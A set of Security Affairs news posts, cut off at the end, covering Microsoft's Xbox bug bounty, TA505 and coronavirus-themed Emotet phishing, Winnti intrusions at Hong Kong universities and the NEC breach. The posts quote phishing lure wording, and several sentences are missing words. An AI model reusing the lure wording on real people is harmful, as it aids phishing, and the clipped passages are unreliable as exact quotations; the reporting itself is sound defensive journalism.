Bounty awards range from $500 up to $20,000. Higher awards are possible, at Microsoft’s sole discretion, based on report quality and vulnerability impact. Researchers who provide submissions that do not qualify for bounty awards may still be eligible for public acknowledgment if their submission leads to a vulnerability fix.

Security ImpactReport QualitySeverity
CriticalImportantModerateLow
Remote Code ExecutionHighMediumLow$20,000 $15,000 $10,000$15,000 $10,000 $5,000N/AN/A
Elevation of PrivilegeHighMediumLow$8,000
$4,000
$3,000
$5,000 $2,000 $1,000$0N/A
Security Feature BypassHighMediumLowN/A$5,000
$2,000
$1,000
$0N/A
Information DisclosureHighMediumLowN/A$5,000
$2,000
$1,000
$0$0
SpoofingHighMediumLowN/A$5,000 $2,000 $1,000$0$0
TamperingHighMediumLowN/A$5,000
$2,000
$1,000
$0$0
Denial of ServiceHigh/LowOut of Scope

Hackers that report remote code execution flaws can earn between $5,000 and $20,000, while privilege escalation vulnerabilities could be rewarded with payouts between $1,000 and $8,000. The remaining issues will be paid between $1,000 and $5,000.

Microsoft will review every submission on a case-by-case basis, anyway, some common low-severity issues that are out of scope and that typically do not earn bounty rewards are:

  • Server-side information disclosure such as IPs, server names and most stack traces
  • Low impact CSRF bugs (such as logoff)
  • Denial of Service issues
  • Issues relating to Fraud
  • Sub-Domain Takeovers
  • Cookie replay vulnerabilities
  • URL Redirects (unless combined with another vulnerability to produce a more severe vulnerability)

“Since launching in 2002, the Xbox network has enabled millions of users to share their common love of gaming on a safe and secure service. The bounty program supplements our existing investments in security development and testing to uncover and remediate vulnerabilities which have a direct and demonstrable impact on the security of Xbox customers,” reads the announcement published by Microsoft.

Pierluigi Paganini

(SecurityAffairs – Xbox, hacking)

The post Microsoft announces the launch of a bug bounty program for Xbox appeared first on Security Affairs.

Security Affairs newsletter Round 249

A new round of the weekly newsletter arrived! The best news of the week with Security Affairs

Authorities arrest 3 Indonesian hackers behind many Magecart attacks
City of Potsdam offline following a cyberattack
A new piece of Ryuk Stealer targets government, military and finance sectors
Aggah: How to run a botnet without renting a Server (for more than a year)
Did H&M spy on its German employees? Privacy watchdog opens an investigation
Mozilla banned hundreds of malicious Firefox add-ons over the last weeks
Operation Night Fury: Group-IB helps take down a cybergang behind the infection of hundreds of websites all over the world
Which was the most common threat to macOS devices in 2019? Shlayer malware
A new piece of Snake Ransomware targets ICS processes
Attacks on Citrix servers increase after the release of CVE-2019-19781 exploits
Cyber Threat Trends Dashboard
Fortinet removed hardcoded SSH keys and database backdoors from FortiSIEM
A vulnerability in Zoom platform allowed miscreants to join Zoom meetings
CVE-2020-7247 RCE flaw in OpenSMTPD library affects many BSD and Linux distros
Magento 2.3.4 addresses three critical Code execution flaws
Phantom of the ADAS – Phantom Attacks Against Advanced Driving Assistance Systems
Wawa card breach: 30 million card records for sale in the dark web
Check Point detailed two flaws in Microsoft Azure that could have allowed taking over cloud servers
Cisco Small Business Switches affected by DoS and information disclosure flaws
Leaked confidential report states United Nations has been hacked
Over 200K WordPress sites potentially exposed to hack due to Code Snippets flaw
US Govn contractor Electronic Warfare Associates infected with Ryuk ransomware
Hackers penetrated NEC defense business division in 2016
Iran-linked APT34 group is targeting US federal workers
NIST Tests Forensic Methods for Getting Data From Damaged Mobile Phones
Report: Threat of Emotet and Ryuk
US continues to press UE members to ban Huawei and Chinese 5G technologies
Crooks start exploiting Coronavirus as bait to spread malware
Winnti APT Group targeted Hong Kong Universities

Pierluigi Paganini

(SecurityAffairs – newsletter, hacking)

The post Security Affairs newsletter Round 249 appeared first on Security Affairs.

Microsoft warns TA505 changed tactic in an ongoing malware campaign

An ongoing phishing campaign launched by TA505 is using attachments featuring HTML redirectors for delivering malicious Excel docs

Security experts from Microsoft have uncovered an ongoing phishing campaign launched by the TA505 cybercrime gang (aka Evil Corp) that is employing attachments featuring HTML redirectors for delivering malicious Excel docs.

According to Microsoft, this is the first time that the TA505 group is using this tactic.

TA505 hacking group has been active since 2014 focusing on Retail and banking sectors. The group is also known for some evasive techniques they put in place over time to avoid the security controls and penetrate corporate perimeters with several kinds of malware, for instance abusing the so-called LOLBins (Living Off The Land Binaries), legit programs regularly used by victim, or also the abuse of valid cryptographically signed payloads.

The TA505 group was involved in campaigns aimed at distributing the Dridex banking Trojan, along with Locky, BitPaymer, Philadelphia, GlobeImposter, and Jaff ransomware families.

Security experts from cyber-security firm Prevailion reported that TA505 has compromised more than 1,000 organizations.

“During our analysis of this campaign we were able to identify at least one U.S. based electrical company, a U.S. state government network, and one of the world’s largest twenty-five banks exhibiting evidence of compromise. The map below denotes organizations that present EoC associated with TA505 indicators.” reads the analysis published by Prevailion.

Now Microsoft confirmed to have observed an ongoing “Dudear (aka TA505, Evil Corp)” phishing campaign that was distributing an information-stealer tracked as GraceWire (aka FlawedGrace)

“This is the first time that Dudear is observed using HTML redirectors. The attackers use HTML files in different languages. Notably, they also use an IP traceback service to track the IP addresses of machines that download the malicious Excel file.” Tweeted Microsoft.

Experts from Microsoft revealed that attackers are using HTML redirectors attached to emails. Once the victims opened the message, the HTML leads to the download a weaponized Excel file that drops the final payload. This is the first time that TA505 uses this technique, in the past, the group used spam messages carrying the malware as an attachment or used malicious URLs.

The victims are then tricked into opening the Excel document as online previewing is not available and to enable editing of the file to access its content.

“Once you have enabled editing, please click Enable Content from the yellow bar above,” the bait Microsoft Office doc adds.

Experts pointed out that operators behind this phishing campaign also use localized HTML files in different languages to target users worldwide.

The attackers are able to track the IP addresses of machines that download the malicious Excel file by using an IP traceback service

Microsoft Security Intelligence provides a full list of indicators of compromise (IOCs) via Twitter:

The good news is that Microsoft Security Intelligence has confirmed that Microsoft Threat Protection is able to neutralize the attack. Office 365 is able to detect malicious attachments and URLs employed in this campaign and Microsoft Defender ATP is also able to detect malicious HTML, Excel file and payload used by TA505

Pierluigi Paganini

(SecurityAffairs – TA505, hacking)

The post Microsoft warns TA505 changed tactic in an ongoing malware campaign appeared first on Security Affairs.

Crooks start exploiting Coronavirus as bait to spread malware

Security researchers warn of malspam campaigns aimed at spreading malware that exploits media attention on the coronavirus epidemic.

Unscrupulous cybercriminal groups are attempting to exploit media attention on the coronavirus to infect systems worldwide.

Recently, coronavirus is monopolizing media attention, users online are searching for information about the virus and the way it is rapidly spreading worldwide.

coronavirus

In this scenario, it is quite easy for crooks to use this topic to trick victims into opening weaponized documents or visiting malicious websites.

Terms such as ‘Wuhan’ (the city that is considered the epicenter of infection) and ‘coronavirus’ are trend topics on social networks.

Cybercrime groups who have already started malspam attacks that attempt to take advantage of the high interest of online users on the topic, we have observed similar scenarios in the past immediately after natural disasters and other tragedies.

Mindful of what has happened in the p I have immediately alerted the group of researchers from Cybaze-Yoroi Z-Lab malware laboratory asking them to remain vigilant on any spam campaigns aimed at distributing malicious codes by spreading bait documents that p information about the coronavirus.

While media were confirming the first cases of coronavirus infections, the researchers of Cybaze-Yoroi Z-Lab observed the bait spam emails promising info on the virus, the messages were used to spread of versions of the well-known Emotet malware.

Researchers from Z-Lab confirmed that at the time of their analysis, attackers were using specially-crafted messages to lure victims into opening weaponized office documents. The bait documents were containing macros used to down, while the versions of Emotet used are the same as those observed in campaigns in recent months.

According to security firm Kaspersky, attackers are using several types of malicious files, including pdf, mp4 and docx with “coronavirus” theme to spread malware. Many of the files used in the attacks observed by the experts in these hours are presented as documents containing information about the virus, its diffusion, and instructions on how to prevent the contagion.

The bait documents are used to deliver several types of malware, including banking Trojans, ransomware and worms.

“We have only observed 10 unique files but, as often happens with topics of general interest, we expect this trend to grow. Given that this is a topic that is generating great concern among people all over the world, we are confident that we will detect more and more malware hiding behind false documents on the spread of the coronavirus, “explained Anton Ivanov, Kaspersky’s malware analyst.

Security experts from IBM X-Force p a more technical report that describes an ongoing campaign targeting Japanese users in the attempt of spreading the Emotet malware.

“X-Force discovered the first campaign of this type, in which the outbreak of a biological virus is used as a means to distribute a computer virus. What makes these attacks rather special, is the fact that they deliver the Emotet trojan, which has shown increased activity recently.” reads the analysis published by IBM. “It achieves this by urging its victims into opening an attached Word document, described as a supposed notice regarding infection prevention measures.”

IBM confirmed that crooks were exploiting the interest on coronavirus to spread the Emotet banking trojan through bait word documents spread via e-mail.

By analyzing of the indicators of compromise provided by IBM X-FORCE, I can confirm that the EMOTET variant employed in this “coronavirus” campaign has been already widely used in past “corporate style payment” campaigns. The fingerprint associated with this malware links to fake invoice documents recently observed in most EMOTET campaigns.” Explained Antonio Pirozzi, head of Cybaze-Yoroi Zlab.

“The report published by Kaspersky includes signatures collected by its telemetry, come of them confirm the presence of different possible active campaigns delivering other families of malware. Kaspersky researchers have identified only ten unique files, as reported by the malware analyst Anton Ivanov, but obviously this is an indication that several actors are exploiting the attention on the coronavirus topic, and the trend could grow up in the next hours.”

IBM provides some examples of e-mails apparently sent by a disability welfare service provider in Japan.

coronavirus

The text of the messages states that there have been reports of coronavirus infections in some prefectures in Japan and urges the reader to view the attached document.

"Jurisdiction tsusho / facility related disability welfare service providerWe become indebted to.Patients were reported about the new type of coronavirus-related pneumonia, mainly in Takeshi, China.In Japan, patients are being reported in Osaka Prefecture,Along with the anticipated increase in the number of visitors to Japan, a separate notice has been issued.Therefore, please check the attached notice," reads the content of the email.

Following a consolidated infection pattern, once the document has been opened, the user displays the request to enable the macros to view its contents. Unfortunately, by enabling macros, the machine infection process starts, a powershell is silently executed to download and install a version of the Emotet trojan.

“After running the document through a sandbox, we could retrace the infection process. If the attachment of sample 3 has been opened with macros enabled, an obfuscated VBA macro script opens powershell and installs an Emotet downloader in the background. This is the typical behaviour of most Emotet documents.” continues IBM.

What will happen in the next few weeks?

In the next weeks, a growing number of threat actors will exploit the coronavirus theme, let me suggest to follow some simple tips to prevent the infection:

  • Do not open suspicious links inviting you to view coronavirus information. These links can be spread through email, instant messaging app messages such as WhatsApp, and also social networks. Always search for coronavirus information from reliable and legitimate sources, ignore any unsolicited messages, even if they come from people you trust.
  • Keep your software systems up to date, and use a reliable security solutions on your desktop and mobile systems.

Pierluigi Paganini

(SecurityAffairs – coronavirus, hacking)

The post Crooks start exploiting Coronavirus as bait to spread malware appeared first on Security Affairs.

Winnti APT Group targeted Hong Kong Universities

Winnti Group has compromised computer systems at two Hong Kong universities during the Hong Kong protests that started in March 2019.

Hackers from the China-linked Winnti group have compromised computer systems at two Hong Kong universities during the Hong Kong protests that started in March 2019.

Researchers from ESET discovered the attacks in November 2019 when they spotted the ShadowPad launcher malware samples on multiple devices at the two universities. The launchers were discovered two weeks after Winnti malware infections were detected in October 2019.

“In November 2019, we discovered a new campaign run by the Winnti Group against two Hong Kong universities. We found a new variant of the ShadowPad backdoor, the group’s flagship backdoor, deployed using a new launcher and embedding numerous modules.” reads the analysis published by ESET. “The Winnti malware was also found at these universities a few weeks prior to ShadowPad.”

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including  Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEADPassCV, Wicked Panda, and ShadowPad.

Experts discovered samples from both ShadowPad and Winnti at the universities that were containing campaign identifiers and C&C URLs with the names of the universities, a circumstance that indicates a highly targeted attack.

“One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld:443 where [backdoor_type] is a single letter which is either “w” in the case of the Winnti malware or “b” in the case of ShadowPad.” continues the report.

“From this format, we were able to find several C&C URLs, including three additional Hong Kong universities’ names. The campaign identifiers found in the samples we’ve analyzed match the subdomain part of the C&C server, showing that these samples were really targeted against these universities.”

One can observe that the C&C URL used by both Winnti and ShadowPad complies to the scheme [backdoor_type][target_name].domain.tld:443 where [backdoor_type] is a single letter which is either “w” in the case of the Winnti malware or “b” in the case of ShadowPad.

Analyzing the C&C URL format experts determined that hackers targeted three additional Hong Kong universities. 

The ShadowPad multi-modular backdoor employed in the attacks against the Hong Kong universities was referencing 17 modules focused on info-stealing that were used to collect information from infected systems.

“In contrast, the variants we described in our white paper didn’t even have that module embedded.” continues the report.

Winnti shadowPad

Unlike previous variants of the ShadowPad backdoor detailed in ESET white paper on the arsenal of the Winnti Group, this launcher is not obfuscated using VMProtect, instead it used XOR-encryption rather than the typical RC5 key block encryption algorithm.

Other technical details are reported in the ESET’s analysis, including Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post Winnti APT Group targeted Hong Kong Universities appeared first on Security Affairs.

Hackers penetrated NEC defense business division in 2016

Japanese electronics and IT giant NEC confirmed a security breach suffered by its defense business division in December 2016.

The IT giant NEC confirmed that the company defense business division has suffered a security breach back in December 2016.

The Japanese firm confirmed the unauthorized access to its internal network after Japanese newspapers disclosed the security incident citing sources informed of the event.

NEC is a contractor for Japan’s defense industry and was involved in various defense projects.

Roughly 28,000 files were found by the company on one of the compromised servers, some of them containing info about defense equipment.

“In July 2018, we succeeded in decrypting encrypted communication with an infected server and an external server that was performing unauthorized communication, and stored it on our internal server for information sharing with other departments used by our defense business division 27,445 files were found to have been accessed illegally.

As a result of investigations conducted by the Company and external specialized organizations, no damage such as information leakage has been confirmed so far.” reads the statement from the company.

“These files do not contain confidential information or personal information. In addition, since July 2018, the situation has been individually explained to customers related to files that have been accessed illegally,”

The situation is different according to the Nikkei newspaper that reported that the Japanese Ministry of Defense said that the exposed files contained “information on contracts with NEC, not defense secrets, and there is no impact on Japan’s defense system.”

NEC was informed of the intrusion in July 2017 by a security company contracted by the electronics company to investigate alleged unauthorized accesses to the internal network.

In July 2018, the company was able to decrypt unauthorized communications between an internal server and an external machine and discovered further compromise.

NEC announced it has taken steps to improve the security of its infrastructure and prevent future intrusions.

Recently another Japanese multinational electronics giant disclosed a data breach, last week Mitsubishi Electric disclosed a security breach that might have exposed personal and confidential corporate data. According to the company, attackers did not obtain sensitive information about defense contracts.

The breach was detected almost eight months ago, on June 28, 2019, with the delay being attributed to the increased complexity of the investigation caused by the attackers deleting activity logs. Mitsubishi Electric disclosed the security incident only after two local newspapers, the Asahi Shimbun and Nikkei, reported the security breach.

The attackers have exploited a directory traversal and arbitrary file upload vulnerability, tracked as CVE-2019-18187, in the Trend Micro OfficeScan antivirus.

Trend Micro has now addressed the vulnerability, but we cannot exclude that the hackers have exploited the same issue in attacks against other targets. After the security firm patched the CVE-2019-18187 flaw in October, it warned customers that the issue was being actively exploited by hackers in the wild.

Pierluigi Paganini

(SecurityAffairs – NEC, hacking)

The post Hackers penetrated NEC defense business division in 2016 appeared first on Security Affairs.

US continues to press UE members to ban Huawei and Chinese 5G technologies

The United States appreciated European Union’s new rules on 5G networks, but pressed them to ban China’s Huawei technology.

The EU’s executive Commission this week presented a set of rules and technical measures aimed at reducing cybersecurity risks from the adoption of 5G networks. The Commission’s recommendations include blocking high-risk equipment suppliers from “critical and sensitive” components of 5G infrastructures, such as the core.

“As many critical services will depend on 5G, ensuring the security of our networks is of high strategic importance for the entire European Union,” the EU’s executive vice president overse